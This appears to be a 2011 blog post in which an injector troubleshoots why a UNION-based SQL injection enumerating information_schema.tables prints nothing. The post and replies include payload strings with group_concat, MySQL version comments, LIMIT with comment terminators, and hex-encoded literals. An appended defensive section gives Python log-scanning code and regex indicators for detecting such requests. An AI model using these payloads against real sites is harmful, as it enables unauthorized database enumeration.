
Tuesday, November 1, 2011

nothing from information_schema.tables

Greetings good and bad injectors. Any idea why this first query prints nothing, while the next query prints dozens of 9's?
page.php?id=123 union select 1,2,group_concat(table_name) from information_schema.tables
page.php?id=123 union select 1,2,group_concat(9) from information_schema.tables
Also tried this variant, but got nothing again:
page.php?id=123 union select 1,2,group_concat(/*!table_name*/) from information_schema.tables


All table names concatenated returns quite a long string; maybe the webapp doesn't like that. Try to limit the result and to remove the remaining parts of the original SQL query by placing comments at the end:
page.php?id=123 union select 1,2,group_concat(table_name) from information_schema.tables limit 10-- -


Tried with LIMIT and commenting, but still no show.

If I select a 1000-char string instead of group_concat, the webapp does display it. Example:

$phpString = '0x'.bin2hex(str_repeat('a',1000));
page.php?id=123 union select 1,2,$phpString from information_schema.tables limit 1--

Also, LIMIT makes no difference to the size of group_concat, which always returns 1 record anyway.
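From the defender's side, as an added example that is not part of the original post or its replies: detection logic over constructed access-log lines that normalizes the request query the way the thread's payloads require (URL decoding, unwrapping MySQL /*!...*/ version comments, lowercasing) and flags UNION SELECT reads of information_schema, the 0x-hex string trick and the trailing "--" terminator. The log lines and the indicator names are constructed for this example.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (not from the original post); the query strings
# mirror the payload shapes discussed in the thread, URL-encoded as a server would log them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Nov/2011:10:01:02 +0000] "GET /page.php?id=123 HTTP/1.1" 200 512
10.0.0.9 - - [01/Nov/2011:10:01:07 +0000] "GET /page.php?id=123%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables HTTP/1.1" 200 4096
10.0.0.9 - - [01/Nov/2011:10:01:09 +0000] "GET /page.php?id=123%20union%20select%201,2,group_concat(/*!table_name*/)%20from%20information_schema.tables%20limit%2010--%20- HTTP/1.1" 200 4096
10.0.0.9 - - [01/Nov/2011:10:01:11 +0000] "GET /page.php?id=123%20union%20select%201,2,0x6161616161%20from%20information_schema.tables%20limit%201-- HTTP/1.1" 200 1500
10.0.0.7 - - [01/Nov/2011:10:02:00 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 900
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+|-)')

# Indicators are matched against the normalized query; 'union_select' is the gate, the rest add context.
INDICATORS = {
    'union_select': re.compile(r'\bunion\b(\s+all)?\s+select\b'),
    'information_schema': re.compile(r'\binformation_schema\.'),
    'group_concat': re.compile(r'\bgroup_concat\s*\('),
    'hex_literal': re.compile(r'\b0x[0-9a-f]{8,}\b'),        # 0x... string literal, as in the thread
    'comment_terminator': re.compile(r'(--\s|--$|#)'),       # "-- -" / "--" tail that discards the original query
}

def normalize(query: str) -> str:
    """URL-decode, unwrap MySQL /*!...*/ version comments, drop ordinary comments, collapse whitespace."""
    s = unquote_plus(query)
    s = re.sub(r'/\*!\d*\s*(.*?)\*/', r'\1', s)   # /*!table_name*/ -> table_name (MySQL still executes it)
    s = re.sub(r'/\*.*?\*/', ' ', s)               # /* ... */ used as whitespace
    return re.sub(r'\s+', ' ', s).lower()

def classify_request(target: str) -> list:
    """Return the indicator names hit by one request target, or [] when no UNION SELECT structure is present."""
    query = urlsplit(target).query
    if not query:
        return []
    norm = normalize(query)
    hits = [name for name, rx in INDICATORS.items() if rx.search(norm)]
    return hits if 'union_select' in hits else []

def scan_log(text: str) -> list:
    """Parse combined-format lines and report each request carrying a UNION-based injection pattern."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (hits := classify_request(m['target'])):
            findings.append({'ip': m['ip'], 'ts': m['ts'], 'indicators': hits})
    return findings
```

Running `scan_log(SAMPLE_LOG)` reports the three 10.0.0.9 requests and ignores the benign "union station" search, which has no SELECT after the keyword.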
